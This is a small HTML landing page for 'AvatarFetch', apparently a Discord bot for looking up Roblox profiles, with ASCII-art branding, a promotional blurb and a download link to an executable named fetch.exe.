<!DOCTYPE html>
<html>
<head>
    <title>AvatarFetch</title>
    <link rel="icon" type="image/x-icon" href="https://cdn.discordapp.com/attachments/1128055279360147529/1133658586808070184/207736.jpg">
    <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
    <style>
        body {
            background-color: black;
            font-family: 'Roboto', sans-serif;
        }
        h1 {
            text-align: center;
        }
        pre.ascii-art {
            font-family: 'Courier New', monospace;
            color: #2eb9e6;
            font-size: 14px;
            white-space: pre-wrap;
        }
        .bio {
            color: white;
            font-size: 16px;
            text-align: left;
            max-width: 700px;
            margin: 0 auto;
        }
        .download-button {
            display: block;
            text-align: center;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <center>
        <pre class="ascii-art">
 █████╗ ██╗   ██╗ █████╗ ████████╗ █████╗ ██████╗ ███████╗███████╗████████╗ ██████╗██╗  ██╗
██╔══██╗██║   ██║██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██╔════╝██╔════╝╚══██╔══╝██╔════╝██║  ██║
███████║██║   ██║███████║   ██║   ███████║██████╔╝█████╗  █████╗     ██║   ██║     ███████║
██╔══██║╚██╗ ██╔╝██╔══██║   ██║   ██╔══██║██╔══██╗██╔══╝  ██╔══╝     ██║   ██║     ██╔══██║
██║  ██║ ╚████╔╝ ██║  ██║   ██║   ██║  ██║██║  ██║██║     ███████╗   ██║   ╚██████╗██║  ██║
╚═╝  ╚═╝  ╚═══╝  ╚═╝  ╚═╝   ╚═╝   ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚══════╝   ╚═╝    ╚═════╝╚═╝  ╚═╝
        </pre>
    </center>
    <div class="bio">
        <center><strong>🤖 AvatarFetch 🎮</strong></center>
        <center><br>
Welcome to the world of AvatarFetch, your ultimate source for all things Roblox! 🚀<br>
🔍 Just mention a user or provide their Roblox username, and I'll fetch their detailed profile information in a snap!<br>
<br>
Your privacy is essential, and I adhere strictly to Discord's guidelines. So, dive into the world of Roblox knowledge with me by your side!<br>
<br><center><strong>Download Below</strong></center>    
</div>
    <div class="download-button">
        <a href="fetch.exe" download="fetch.exe">
            <img src="AvatarFetch.ico" alt="Download">
        </a>
    </div>
</body>
</html>
